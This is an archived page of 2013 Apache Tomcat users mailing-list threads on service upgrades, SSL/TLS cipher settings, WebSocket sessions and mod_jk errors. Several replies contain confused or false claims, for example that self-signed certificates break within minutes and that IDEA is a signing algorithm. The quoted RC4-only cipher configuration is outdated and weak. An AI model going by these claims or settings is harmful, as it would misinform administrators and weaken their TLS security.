 To: users@tomcat.apache.org
 Subject: Upgrading Tomcat in the customer base
 Date: Tue, 19 Mar 2013 15:24:07 -0400
 
 Hi,
 
 We deploy tomcat in our own folder (c:\rsi_tc\tomcat) on a WIndows  
 machine as a service. We use the service.bat to install
 as a service. Historically to update tomcat we would remove the  
 current version and install the new version. There is rub in all
 this which we have to change the service login to be an account that  
 can access files from a network share. Therefore when
 we upgrade tomcat, we remove the current version and install the new  
 version and then someone ( the customer :-(  ) has to
 go into the service and change the service login back to the account  
 that will give them access to the network share.
 
 I'm looking for a way (if possible) to avoid having the customer to  
 have change the service login. I'm looking for suggestions
 to make this easier and have the following questions about whether  
 some of my thoughts to make it easier are safe.
 
 1. Can I *not* uninstall the service and just replace the folder  
 structure on the file system with the new version? I have tried it
  and it seems to work but question whether or not it is safe. I  
 know if a major version changes I cannot do this as the service
  calls tomcat6.exe vs tomcat7.exe for instance and therefore would  
 have to do the complete uninstall/install.
 
 2. If I do the above does calling the service.bat install again  
 using the *newer* service.bat version make a difference? We are  
 calling it (the newer service.bat)
  and it seems to be harmless and thought that it might help in  
 case something in the batch install changed, we would get the changes.
 
 Bottom line, has anyone faced this dilemma and found a successful way  
 to upgrade a tomcat instance that uses a unique service login.
 
 Thanks for any input.
 Pat
 
 
 
   
 
 
 -
 To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
 For additional commands, e-mail: users-h...@tomcat.apache.org
 
  

RE: SSL Best Practices

[Martin Gainty]

Jeff

do you have keystore and certificate..if not go to verisign and get a CATrusted 
pfx...
the cost is worth it and anything you create with a self-signed cert will be 
broken in less than 5 min

Feel free to Pingback if you have any questions.
 
Martin

  


 From: jeffrey.jan...@polydyne.com
 To: users@tomcat.apache.org
 Subject: RE: SSL Best Practices
 Date: Mon, 18 Mar 2013 13:34:44 +
 
  -Original Message-
  From: Jeffrey D. Fisher [mailto:jeff.fisher12...@cox.net]
  Sent: Friday, March 15, 2013 3:03 PM
  To: users@tomcat.apache.org
  Subject: SSL Best Practices
  
  Gentlemen (Ladies):
  
  
  
  I am looking for a published best practice on editing the SERVER.XML
  configuration file to use SSL/HTTPS. The key are imported into the
  keystore.
  
  
  
  Any input is appreciated.
  
  
  
  Jeff Fisher
  
  Omaha, NE
 
 I would start by reading the Tomcat Documentation on the subject.
 It's pretty straightforward.
 Jeff
 
 
 -
 To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
 For additional commands, e-mail: users-h...@tomcat.apache.org
 
  

RE: Getting HttpSession from HandshakeRequest/Configurator

[Martin Gainty]

Nick
if you dont mind Comet's implementation of WebSocket events to Servlet-3.0 POST 
and GET then checkout http://java.dzone.com/articles/tomcat-websockets-html5

I'll let you test drive to see if Ant 's WebSocketServlet fully supports all 
aspects of the WebSocket spechttp://en.wikipedia.org/wiki/WebSocket

Keep us apprised,
Happy Driving
Martin __ Place Long-winded 
disclaimer here

  From: nicho...@nicholaswilliams.net
 Subject: Getting HttpSession from HandshakeRequest/Configurator
 Date: Sun, 17 Mar 2013 17:56:23 -0500
 To: users@tomcat.apache.org
 
 Based on my reading of the WebSocket spec mailing lists and API 
 documentation, if I want to get the HttpSession that exists when a WebSocket 
 connection is negotiated I need to extend ServerEndpointConfig.Configurator, 
 override #modifyHandshake(), and call #getHttpSession() on the 
 HandshakeRequest. However, I need a little clarification, because I'm not 
 seeing how this is going to work:
 
 1) Tomcat doesn't implement HandshakeRequest ... anywhere. So I'm not even 
 seeing how that method could ever be called with a non-null argument. 
 (Admittedly, I haven't run this yet ... I'm sending this preemptively while I 
 complete my code, to go ahead and get some feedback).
 
 2) None of the arguments to #modifyHandshake() provide access to the Session. 
 So how am I supposed to do anything with it? How can I associate the 
 HttpSession with the Session?
 -
 To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
 For additional commands, e-mail: users-h...@tomcat.apache.org
 
  

RE: Running a binary program from a JSP

[Martin Gainty]

Hi Dan

Earlier I gave him an example of a DWR backend bean which handles the mechanics 
of Runtime.getRuntime().exec(cmd.,exe /C 'fubar');

I *was* going to suggest using An Applet but I didnt want to spend the rest of 
the month twiddling the exact permutation of execute and read permissions

Thanks for the link!
Martin Gainty 
__ 
Verzicht und Vertraulichkeitanmerkung/Note de déni et de confidentialité

Diese Nachricht ist vertraulich. Sollten Sie nicht der vorgesehene Empfaenger 
sein, so bitten wir hoeflich um eine Mitteilung. Jede unbefugte Weiterleitung 
oder Fertigung einer Kopie ist unzulaessig. Diese Nachricht dient lediglich dem 
Austausch von Informationen und entfaltet keine rechtliche Bindungswirkung. 
Aufgrund der leichten Manipulierbarkeit von E-Mails koennen wir keine Haftung 
fuer den Inhalt uebernehmen.
Ce message est confidentiel et peut être privilégié. Si vous n'êtes pas le 
destinataire prévu, nous te demandons avec bonté que pour satisfaire informez 
l'expéditeur. N'importe quelle diffusion non autorisée ou la copie de ceci est 
interdite. Ce message sert à l'information seulement et n'aura pas n'importe 
quel effet légalement obligatoire. Étant donné que les email peuvent facilement 
être sujets à la manipulation, nous ne pouvons accepter aucune responsabilité 
pour le contenu fourni.

  


 Subject: Re: Running a binary program from a JSP
 From: dmik...@vmware.com
 Date: Thu, 14 Mar 2013 08:06:06 -0400
 To: users@tomcat.apache.org
 
 On Mar 14, 2013, at 12:34 AM, Tim Gross wrote:
 
  Hi,
  
  I want to know if it is possible to execute a binary program (written in C)
  from within a JSP. 
 
 Yes.
 
  I would like to do this on the server side, not the
  browser, in Tomcat6. If it is possible, can somebody provide an example.
 
 Use...
 
 http://docs.oracle.com/javase/6/docs/api/java/lang/Runtime.html
 
 or
 
 http://docs.oracle.com/javase/6/docs/api/java/lang/ProcessBuilder.html
 
 Google can give you examples.
 
 Dan
 
  Sorry if I am using the wrong mailing list. Feel free to redirect me if
  that is the case.
  
  Thanks,
  
  Tim.
  
  
  
 
 -
 To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
 For additional commands, e-mail: users-h...@tomcat.apache.org
 
  

RE: Compiling JSPs at runtime

[Martin Gainty]

Zimmer http://www.jarfinder.com/index.php/jars/versionInfo/4589
Viel Gluck
Martin  
__ 
Verzicht und Vertraulichkeitanmerkung
Diese Nachricht ist vertraulich. Sollten Sie nicht der vorgesehene Empfaenger 
sein, so bitten wir hoeflich um eine Mitteilung. Jede unbefugte Weiterleitung 
oder Fertigung einer Kopie ist unzulaessig. Diese Nachricht dient lediglich dem 
Austausch von Informationen und entfaltet keine rechtliche Bindungswirkung. 
Aufgrund der leichten Manipulierbarkeit von E-Mails koennen wir keine Haftung 
fuer den Inhalt uebernehmen.
 

  Date: Sat, 9 Mar 2013 14:39:23 +0100
 Subject: Compiling JSPs at runtime
 From: fb666fb...@gmail.com
 To: users@tomcat.apache.org
 
 Hello!
 
 I'm working on a WCMS system where I want to compile some view components
 at runtime. I found the Jasper howto to compile using Ant, but that's not
 what I need.
 
 I have dynamic JSP code stored in a database.
 
 Simplified I want to do something like this:
 
 protected void doRequest(HttpServletRequest request, HttpServletResponse
 response) throws ServletException, IOException {
 
 int templateId = request.getParameter(templateId);
 String jspCode = db.queryString(select jspCode from templates where id =
 + templateId);
 Jasper jcpc = new Jasper();
 Servlet jspServlet = jspc.compile(jspCode)
 forward(jspServlet);
 
 }
 
 For sure this is very simplified. I know that the Jasper JSPC will need
 much more configuration/environment set.
 
 Can someone point me to the right classes to start?
 
 Thanks,
 Gerd
  

RE: Tomcat does not accept connections from Safari on iPad vs an SSL connector with JSSE ciphers

[Martin Gainty]

someone put cipherSuites patch on TC 7 Connector..

*IF you are implementing TC7 Connector with cipherSuites attribute support and 
have not specified cipherSuites supported by your ppk keys*
 then yes its tomcats fault

Otherwise its not..

Ciao,

Martin Gainty 

__ 

Verzicht und Vertraulichkeitanmerkung

Diese Nachricht ist vertraulich. Sollten Sie nicht der vorgesehene Empfaenger 
sein, so bitten wir hoeflich um eine Mitteilung. Jede unbefugte Weiterleitung 
oder Fertigung einer Kopie ist unzulaessig. Diese Nachricht dient lediglich dem 
Austausch von Informationen und entfaltet keine rechtliche Bindungswirkung. 
Aufgrund der leichten Manipulierbarkeit von E-Mails koennen wir keine Haftung 
fuer den Inhalt uebernehmen.
  


 Date: Fri, 15 Feb 2013 12:36:53 -0500
 From: ch...@christopherschultz.net
 To: users@tomcat.apache.org
 Subject: Re: Tomcat does not accept connections from Safari on iPad vs an SSL 
 connector with JSSE ciphers
 
 -BEGIN PGP SIGNED MESSAGE-
 Hash: SHA256
 
 Giuseppe,
 
 On 2/15/13 9:07 AM, Giuseppe Sacco wrote:
  Debugging the SSL handshake, I found that the problem is really
  about ciphers because the handshake fails with exception 
  javax.net.ssl.SSLHandshakeException: no cipher suites in common
  
  So, this is really something to be investigated in JSSE instead of 
  tomcat. I am sorry for noise in this list :-(
 
 We were pretty sure it wasn't Tomcat's fault, but we can still
 probably help.
 
  Allow legacy hello messages: true [snip] http-192.168.1.55-8443-1,
  READ: SSLv3 Handshake, length = 75 *** ClientHello, SSLv3 
  RandomCookie: GMT: 1360933724 bytes = { 203, 86, 168, 88, 75, 77,
  52, 134, 4, 76, 204, 78, 0, 160, 168, 123, 96, 78, 106, 23, 40, 47,
  219, 81, 28, 23, 174, 156 } Session ID: {} Cipher Suites:
  [TLS_EMPTY_RENEGOTIATION_INFO_SCSV, Unknown 0x0:0x3d, Unknown
  0x0:0x3c, TLS_RSA_WITH_AES_128_CBC_SHA, SSL_RSA_WITH_RC4_128_SHA,
  SSL_RSA_WITH_RC4_128_MD5, TLS_RSA_WITH_AES_256_CBC_SHA,
  SSL_RSA_WITH_3DES_EDE_CBC_SHA, Unknown 0x0:0x67, Unknown 0x0:0x6b,
  TLS_DHE_RSA_WITH_AES_128_CBC_SHA, TLS_DHE_RSA_WITH_AES_256_CBC_SHA,
  SSL_DHE_RSA_WITH_3DES_EDE_CBC_SHA, Unknown 0x0:0x3b,
  SSL_RSA_WITH_NULL_SHA, SSL_RSA_WITH_NULL_MD5] Compression Methods:
  { 0 } ***
 
 So the client is doing an SSLv3 handshake. The message above about
 allowing legacy hellos seems like it should support a SSLv3
 handshake. Looking at the ciphers, your JVM (without BouncyCastle) and
 client truly have no overlap. I'm actually surprised that your JVM
 does not support any TLS_RSA_* or TLS_DHE_* ciphers. Can you re-run my
 cipher-dump program without BouncyCastle and provide the full output?
 I was a little unclear as to what you posted last time.
 
 - -chris
 -BEGIN PGP SIGNATURE-
 Version: GnuPG/MacGPG2 v2.0.17 (Darwin)
 Comment: GPGTools - http://gpgtools.org
 Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/
 
 iEYEAREIAAYFAlEecjUACgkQ9CaO5/Lv0PCEnwCdE7P2NRug8jYW+GcdcT2kUB7u
 ZGwAoKNBfMMPOQCAm2IATvldiWpaAVrO
 =qMlU
 -END PGP SIGNATURE-
 
 -
 To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
 For additional commands, e-mail: users-h...@tomcat.apache.org
 
  

RE: mod_jk errors errno=110 and errno=115

[Martin Gainty]

Phillipe

ajp_send_request::jk_ajp_common.c (1630):
(nodeYY) connecting to backend failed. Tomcat is probably not started or is
listening on the wrong port (errno=115)

indicate that you might have a misconfig on jk.properties ...check out host and 
port attributes here
http://tomcat.apache.org/connectors-doc/reference/workers.html
Bon Chance,
Martin 
__ 
Note de déni et de confidentialitéCe message est confidentiel et peut être 
privilégié. Si vous n'êtes pas le destinataire prévu, nous te demandons avec 
bonté que pour satisfaire informez l'expéditeur. N'importe quelle diffusion non 
autorisée ou la copie de ceci est interdite. Ce message sert à l'information 
seulement et n'aura pas n'importe quel effet légalement obligatoire. Étant 
donné que les email peuvent facilement être sujets à la manipulation, nous ne 
pouvons accepter aucune responsabilité pour le contenu fourni.

  Date: Thu, 14 Feb 2013 14:17:10 +0100
 Subject: mod_jk errors errno=110 and errno=115
 From: pbo...@gmail.com
 To: users@tomcat.apache.org
 
 Hello,
 
 We have a mod_jk in version 1.2.28 with Apache 2.16  fronting a Tomcat
 server in version 6 on JDK6.
 
 We are facing long response times and timeouts from time to time.
 Mod_jk log files show the following errors:
 
 [][X] [error] ajp_connect_to_endpoint::jk_ajp_common.c
 (1035): (nodeXX) cping/cpong after connecting to the backend server failed
 (errno=110)
 [][X] [error] ajp_send_request::jk_ajp_common.c (1630):
 (nodeXX) connecting to backend failed. Tomcat is probably not started or is
 listening on the wrong port (errno=110)
 [][X] [error] ajp_connect_to_endpoint::jk_ajp_common.c
 (1035): (nodeXX) cping/cpong after connecting to the backend server failed
 (errno=110)
 [][X] [error] ajp_send_request::jk_ajp_common.c (1630):
 (nodeXX) connecting to backend failed. Tomcat is probably not started or is
 listening on the wrong port (errno=110)
 [][X] [error] ajp_service::jk_ajp_common.c (2626): (nodeXX)
 connecting to tomcat failed.
 
 
 [][X] [error] ajp_send_request::jk_ajp_common.c (1630):
 (nodeYY) connecting to backend failed. Tomcat is probably not started or is
 listening on the wrong port (errno=115)
 
 [][X] ] [error] ajp_send_request::jk_ajp_common.c (1630):
 (nodeYY) connecting to backend failed. Tomcat is probably not started or is
 listening on the wrong port (errno=115)
 [][X]  [error] ajp_service::jk_ajp_common.c (2626):
 (nodeYY) connecting to tomcat failed.
 
 
 What could be the explanations except for Tomcat Thread pool not having
 threads available anymore ? Thing we checked.
 
 Was there fixes in new mod_jk versions (1.2.37) regarding issues like these
 ?
 
 
 Thanks for your help
  

RE: Problem

[Martin Gainty]

eclipse is an enormous resource hog..Ive seen eclipse crash when someone opens 
vi after eclipse is running

so the problem is not tomcat but your Tomcat (sysdeo? plugin)

which version Tomcat(sysdeo?) plugin are you running?

Martin __ 
Verzicht und Vertraulichkeitanmerkung
Diese Nachricht ist vertraulich. Sollten Sie nicht der vorgesehene Empfaenger 
sein, so bitten wir hoeflich um eine Mitteilung. Jede unbefugte Weiterleitung 
oder Fertigung einer Kopie ist unzulaessig. Diese Nachricht dient lediglich dem 
Austausch von Informationen und entfaltet keine rechtliche Bindungswirkung. 
Aufgrund der leichten Manipulierbarkeit von E-Mails koennen wir keine Haftung 
fuer den Inhalt uebernehmen.
  From: vinit1...@live.in
 To: users@tomcat.apache.org
 Subject: RE: Problem
 Date: Mon, 21 Jan 2013 10:50:36 +0530
 
 I have run the TC in standlone mode...and it is running ..
 but when running thru eclipse juno ...it is showing the message -
 Server Tomcat v7.0 Server at localhost was unable to start within 45 seconds. 
 If the server requires more time, try increasing the timeout in the server 
 editor.
 
 i have reinstalled the plugin and increase the start timeout...its makes no 
 change. thanks
 
  From: mgai...@hotmail.com
  To: users@tomcat.apache.org
  Subject: RE: Problem
  Date: Sat, 19 Jan 2013 08:40:09 -0500
  
  
  what does the TC log say..
  
  have you run TC standalone $CATALINA_HOME\bin\catalina start
  
  if TC runs standalone but not thru eclipse then you have 2 possible 
  problems:
  
  1)possible Mis-configured TC eclipse plugin
  2)There is a problem with TC eclipse plugin itself..probably
2a)possible version mismatch between TC plugin and child dependencies
  
   2b)possible resource allocation issue..socket bound..not enough PermGen 
  space etc pingback with your findings
  
  Martin__ 
  Verzicht und Vertraulichkeitanmerkung Diese Nachricht ist vertraulich. 
  Sollten Sie nicht der vorgesehene Empfaenger sein, so bitten wir hoeflich 
  um eine Mitteilung. Jede unbefugte Weiterleitung oder Fertigung einer Kopie 
  ist unzulaessig. Diese Nachricht dient lediglich dem Austausch von 
  Informationen und entfaltet keine rechtliche Bindungswirkung. Aufgrund der 
  leichten Manipulierbarkeit von E-Mails koennen wir keine Haftung fuer den 
  Inhalt uebernehmen.
From: vinit1...@live.in
   To: users@tomcat.apache.org
   Subject: Problem
   Date: Sat, 19 Jan 2013 13:22:17 +0530
   
   Hi all,I am having a problem in starting the apache tomcat server version 
   7.0.31 through eclipse.It is showing the message that server taking time 
   to start the server,so increase the start time limit,after configuring 
   this  i am not able to rectify this problem.
   thanks  

 
  

RE: session not working when dash or underscore in application name

[Martin Gainty]

There are a number of TC variables that are acquired from the FileSystem during 
webapp initialiasation..
unfortunately when File systems assign folder name they vary widely in their 
treatment of 'special characters' in filenames
as a test ..install Tomcat to Tomcat off of root folder then place webapps off 
of Tomcat then install one webapp heads-or-tails

so in your mind your filesystem *should* look like
/Tomcat/webapps/heads-or-tails But NTFS File System creates an 8 character 
filename that it assigns as directory folder so instead of heads-or-tails 
folder you'll get
/Tomcat/webapps/HEADS-~1 Not inserting spaces, dashes (or anything besides 
a-z,0-9,A-Z) into folder-name is always a safe deployment strategy
Bon Chance,
Martin Gainty 
__ 
Note de déni et de confidentialitéCe message est confidentiel et peut être 
privilégié. Si vous n'êtes pas le destinataire prévu, nous te demandons avec 
bonté que pour satisfaire informez l'expéditeur. N'importe quelle diffusion non 
autorisée ou la copie de ceci est interdite. Ce message sert à l'information 
seulement et n'aura pas n'importe quel effet légalement obligatoire. Étant 
donné que les email peuvent facilement être sujets à la manipulation, nous ne 
pouvons accepter aucune responsabilité pour le contenu fourni.

  Date: Sun, 20 Jan 2013 10:51:10 +0100
 From: benintechnolog...@yahoo.fr
 To: users@tomcat.apache.org
 Subject: Re: session not working when dash or underscore in application name
 
 Thanks, maybe the problem has been solved in 7.0.34, I'll try that 
 version later
 in the meantime I simply removed all dashes and underscores, and 
 everything works fine
 
 Le 19/01/2013 20:52, Christopher Schultz a écrit :
  -BEGIN PGP SIGNED MESSAGE-
  Hash: SHA256
 
  To whom it may concern,
 
  On 1/19/13 7:15 AM, Benin Technologies wrote:
  I just installed Tomcat 7.0.32 on Debian Linux 6 (Squeeze). Client
  is Mozilla Firefox 12.0, also on Debian Linux 6.
 
  To test session behavior, I did a simple JSP page that simulates a
  coin launch (heads or tales), and displays the total of heads and
  total of tails.
 
  If my war file is called headsOrTails.war, it works just fine :
  http://tomcat:8080/headsOrTails/
 
  but if there are dashes or underscores in the name, Tomcat creates
  a new session for each page request (so I can't get the totals)
  http://tomcat:8080/heads-or-tails/
  http://tomcat:8080/heads_or_tails/
 
  is this a normal behavior ?
  I do not experience the behavior you describe on 7.0.34.
 
  Neither dashes nor underscores anywhere in the path of the JSP seem to
  have that effect: a single session is created when I try it.
 
  Perhaps something else is affecting your environment?
 
  - -chris
  -BEGIN PGP SIGNATURE-
  Version: GnuPG/MacGPG2 v2.0.17 (Darwin)
  Comment: GPGTools - http://gpgtools.org
  Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/
 
  iEYEAREIAAYFAlD6+X0ACgkQ9CaO5/Lv0PDYxACeIdD6MLMC1P8Fwpzk6BFCHjnR
  ZiIAoJRe1RfgHH9ZWbe9T6lDMn3A+PbO
  =n4ZY
  -END PGP SIGNATURE-
 
  -
  To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
  For additional commands, e-mail: users-h...@tomcat.apache.org
 
 
 
 
 -
 To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
 For additional commands, e-mail: users-h...@tomcat.apache.org
 
  

RE: Problem

[Martin Gainty]

what does the TC log say..

have you run TC standalone $CATALINA_HOME\bin\catalina start

if TC runs standalone but not thru eclipse then you have 2 possible problems:

1)possible Mis-configured TC eclipse plugin
2)There is a problem with TC eclipse plugin itself..probably
  2a)possible version mismatch between TC plugin and child dependencies

 2b)possible resource allocation issue..socket bound..not enough PermGen space 
etc pingback with your findings

Martin__ 
Verzicht und Vertraulichkeitanmerkung Diese Nachricht ist vertraulich. Sollten 
Sie nicht der vorgesehene Empfaenger sein, so bitten wir hoeflich um eine 
Mitteilung. Jede unbefugte Weiterleitung oder Fertigung einer Kopie ist 
unzulaessig. Diese Nachricht dient lediglich dem Austausch von Informationen 
und entfaltet keine rechtliche Bindungswirkung. Aufgrund der leichten 
Manipulierbarkeit von E-Mails koennen wir keine Haftung fuer den Inhalt 
uebernehmen.
  From: vinit1...@live.in
 To: users@tomcat.apache.org
 Subject: Problem
 Date: Sat, 19 Jan 2013 13:22:17 +0530
 
 Hi all,I am having a problem in starting the apache tomcat server version 
 7.0.31 through eclipse.It is showing the message that server taking time to 
 start the server,so increase the start time limit,after configuring this  i 
 am not able to rectify this problem.
 thanks  
  

RE: Restricting ciphers

[Martin Gainty]

   
 1. The ciphers parameter in Connecter determines the enabled cipher suites
 in the SSLSocket. See SSLSocket.setEnabledCipherSuites(). That in turn
 restricts which actual cipher suite can be negotiated with the client,
 depending also on the client's cipher suites and how JSSE chooses among
 those that intersect.  MGunderstood
 
 2. The private key itself doesn't have any 'supported ciphers'  so your
 question is already meaningless. However (a) it does have a *type*, which is
 generally RSA or else DH, and (b) it corresponds to a single X.509
 certificate which contains a public key in the same type or format.
MGyes the public key would implement RSA or DH or Idea or some other *type*

 If the
 server requests a client certificate, it (i.e. JSSE, not Tomcat) sends an
 SSL CertificateRequest message, which contains a list of acceptable
 certificate types and a list of acceptable signers. 
MGthus the choice for cipher suites is now assigned
 MGreprising the publicKey signer algorithm to cipher suite
MGWith a RSA (public)key you can nominally use the RSA and DHE_RSA cipher 
suite. But if the server certificate has a Key Usage 
extension which does not include the keyEncipherment flag, then you are 
nominally limited to DHE_RSA.
MGWith a DSA (public) key you can use only a DHE_DSS cipher suite.
MGWith a Diffie-Hellman (public) key, you can use only one of DH_RSA or 
DH_DSS, depending on the issuing certificate authority key type.
 If the client certificate isn't one of those types or isn't signed by one 
 of those signers it isn't sent MGthe choice is made!  and if the Web 
 resource being requested is defined
 as requiring SSL client authentication, Tomcat would then deny access.
MGlets look at the guts of a public key to clarify whats going on MGkeytool 
-list -v -keystore NotForOutsideUse.jks
Keystore type: JKS
Keystore provider: SUN Your keystore contains 1 entry Alias name: Alias 
Creation date: Apr 24, 2012
Entry type: PrivateKeyEntry
Certificate chain length: 1
Certificate[1]:
Owner: UID=99, EMAILADDRESS=paynom...@paynomind.com, CN=BigBank,
 OU=, O=BigBank.com
Issuer: UID=IssuingAuthority, CN=CanonicalName, OU=IT Security, O=CanonicalName 
Serial number: 
Valid from: Tue Apr 24 12:21:00 EDT 2012 until: Fri Apr 24 12:21:00 EDT 2015
Certificate fingerprints:
 MD5:  
 SHA1:   Signature algorithm name: SHA1withRSA
 Version: 3 /snip
lets look at the log produced by TC when Public key =NotForOutsideUse.jks 
request is made in the JSSE Key Exchange

keyStore is : NotForOutsideUse.jks
keyStore type is : jks

init keymanager of type SunX509 found key for : {Omitted}
chain [0] = [
[
  Version: V3
  Subject: UID=99, CN=CanonicalName ID: 99, OU=, O=paynomind.com
  Signature Algorithm: SHA1withRSA  Key:  Sun RSA public key, 2048 bits
  modulus: Omitted   public exponent: 9
  Validity: [From: Fri Dec 10 11:29:21 EST 2010,
   To: Mon Dec 09 11:29:21 EST 2013]
  Issuer: UID=PayNoMind, CN=CanonicalName, OU=Dept1, O=PayNoMind
  SerialNumber: [   Omitted  ]  EXAMPLE CONCLUSION:
the JSSE Key exchange is implementing  SSLV3 Protocol AND  RSA Signing Algo 

from the eligible ciphers listed here 
http://www.openssl.org/docs/apps/ciphers.html could the server implement 
IDEA-CBC-SHA cipher (if listed in Tomcat Connector ciphers=IDEA-CBC-SHA   
...

My understanding is there can be NO handshake as there is a mismatch 
BETWEENSigning Algo already in use (RSA)
with the Signing Algorithm identified by the cipher (IDEA) from the ciphers 
parameter

is this not the case?
 
 Connection between (1) and (2): zero. MGagreed
 
 EJP
 
 -Original Message-
 From: Martin Gainty [mailto:mgai...@hotmail.com] 
 Sent: Friday, 11 January 2013 2:35 PM
 To: Tomcat Users List
 Subject: RE: Restricting ciphers
 
 
 its a simple question what does ciphers parameter in Connector have anything
 to do with the supported ciphers from the key itself the 2 are disconnected
 please dont waste my time and anyone elses with insults when you are unable
 to answer this simple question Martin Gainty
 ___ When Free Speech and Discovery
 are replaced by Confusion and Obfuscation its time to move  Date: Thu, 10
 Jan 2013 18:25:02 -0500
  From: ch...@christopherschultz.net
  To: users@tomcat.apache.org
  Subject: Re: Restricting ciphers
  
  -BEGIN PGP SIGNED MESSAGE-
  Hash: SHA256
  
  Martin,
  
  Honestly, I'm not sure why I'm feeding the troll at this point. Maybe 
  I'm trying to atone for some horrible crime I can't remember.
  
  On 1/10/13 10:05 AM, Martin Gainty wrote:
   terminology :
  
  Nobody was arguing about terminology. Next time, just refer to 
  Wikipedia like everyone else.
  
   All you don't know is whether those certificate  private key are 
   RSA or DSA algorithms
  
  It doesn't matter: you can use RSA (like everyone does) or DSA and 
  that will only determine the type

RE: Restricting ciphers

[Martin Gainty]

 terminology :
the X509 standard defines certificates, and RSA and DSA are two of the public 
key algorithms that can be used in those certificates;
certificates are used to hold public keys, and never private keys.
PKCS#12 is a standard for a container which holds an X509 client certificates 
and  private keys So, if you're examining a PKCS#12 file (typically .p12 
extension or a .pfx extension), then you already know:
It contains at least one X509 client certificate and
corresponding private keys.
All you don't know is whether those certificate  private key are RSA or DSA 
algorithms

You can check this by extracting the certificate(s), and then examine 
them:openssl pkcs12 -in mycert.p12 -clcerts -nokeys -out mycert.crt

openssl x509 -in mycert.crt -text
The text output of the openssl x509 command should include a Subject Public Key 
section, which will include fields that let 

you see if it's an RSA or DSA key (along with the key size). 
http://stackoverflow.com/questions/1722181/determine-certificate-type PublicKey 
Generation:
to generate a public-key from PKCS12 privateKeyAndX509Cert use openssl openssl 
pkcs12 -in myFile.p12 -out myPublicKey.pem -clcerts -nokeys
https://ca.cern.ch/ca/Help/?kbid=023010 KeyAlgorithms:
KeyAlgorithms are categorised to their cipher-groups symmetric ciphers, 
public-key 
ciphers, and one-way hashing to list available ciphers within AES algorithm use 
openssl e.g.
openssl ciphers -v 'AES+HIGH'

cipherGroup is categorised by keysize within cipher-groups (usually a 4digit 
number which is a power  of 2 e.g. 1024 and 2048)
http://www.gnupg.org/gph/en/manual.html#AEN185 each permutation of 
cipherGroup-KeySize is further categorised according to implemented 
ModeOfOperation
http://en.wikipedia.org/wiki/Block_cipher_modes_of_operation 

ECB, CBC and PCBC are the usual choices for the optional ModeOfOperation 
parameter Determining the ALGO-CIPHER supported by your key so we can see that 
public keys contain a algorithm-cipher combination but how to determine the 
algo-cipher supported by your key:

keytool -list -v -keystore fubar.pfx -storetype PKCS12 Here is output:
Certificate fingerprints:
 MD5:   SHA1:  Signature algorithm name: SHA1withRSA 
Providers (SUN, SunJCE, SunJSSE,SunRsaSign, IBMJSSE, bcprov-jdkNN-MMM) Lets 
stick with SunJSSE as our provider
supported ciphers will be those ciphers which match SHA1 with RSA from this 
list:
http://docs.oracle.com/javase/1.5.0/docs/guide/security/jsse/JSSERefGuide.html 
so what you are asking Tomcat Connector to do is

1)export contents of supplied keystoreFile key of keystoreType PKCS12

2)determine Signature algorithm name

3)aggregate cipherSuite by determining Signature specific supported ciphers 
from Signature algorithm name from 
http://docs.oracle.com/javase/1.5.0/docs/guide/security/jsse/JSSERefGuide.html
4)reference ciphers attribute from Tomcat Connector

5)determine SignatureSpecificSupportedCiphers from 3) and implement ONLY those 
ciphers which match exactly 
to the ciphers listed in Tomcat Connector 5)

(i have not seen this currently implemented)
Martin 
__ 
do not alter or disrupt this transmission
  Date: Thu, 10 Jan 2013 11:44:49 +0400
 Subject: Re: Restricting ciphers
 From: knst.koli...@gmail.com
 To: users@tomcat.apache.org
 
 2013/1/10 Baron Fujimoto ba...@hawaii.edu:
  On Wed, Jan 09, 2013 at 01:08:01PM +0400, Konstantin Kolinko wrote:
 2013/1/9 Baron Fujimoto ba...@hawaii.edu:
  I'm attempting to mitigate BEAST (CVE-2011-3389) attacks on Tomcat 6.0.35.
  My understanding is that the attack applies only to CBC ciphers, and that
  RC4 ciphers are not vulnerable, so I am attempting to restrict the set of
  ciphers that Tomcat uses with the following config for a connector:
 
Connector protocol=HTTP/1.1 SSLEnabled=true
   address=0.0.0.0
   port=8443
   maxThreads=150 scheme=https secure=true
   keystoreFile=/path/to/keystore
   keystoreType=pkcs12
   ciphers=TLS_RSA_WITH_RC4_128_SHA,
TLS_RSA_WITH_RC4_128_MD5,
SSL_CK_RC4_128_WITH_MD5
   clientAuth=false sslProtocol=TLS /
 (...)
 
 
 As can be seen from your usage of keystoreType attribute, you are
 using Java implementation of the Connector,  not openssl/APR one.
 
 You should look into Java documentation for their cipher names.
 
 See this thread from October 2009:
 http://markmail.org/message/zn4namfhypyxum23
 
  Ahh, that was it! It did not occur to me that OpenSSL and Java might
  name the ciphers differently.  If I restrict the ciphers to those
  from the (differently named) set used by Java, it works as expected.
  Mahalo!
 
ciphers=SSL_RSA_WITH_RC4_128_MD5,
 SSL_RSA_WITH_RC4_128_SHA,
 TLS_ECDHE_ECDSA_WITH_RC4_128_SHA,
 TLS_ECDHE_RSA_WITH_RC4_128_SHA,
 TLS_ECDH_ECDSA_WITH_RC4_128_SHA,